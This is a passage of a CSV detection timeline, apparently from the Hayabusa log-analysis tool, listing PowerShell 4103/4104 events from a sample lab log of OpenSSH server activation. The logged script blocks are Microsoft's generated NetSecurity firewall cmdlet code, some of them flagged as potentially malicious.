$__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.371 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.371 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral 
Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.372 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.372 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.401 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if 
($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSecurityFilter' -Alias '*' function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.401 
+00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSecurityFilter' -Alias '*' function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.401 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; 
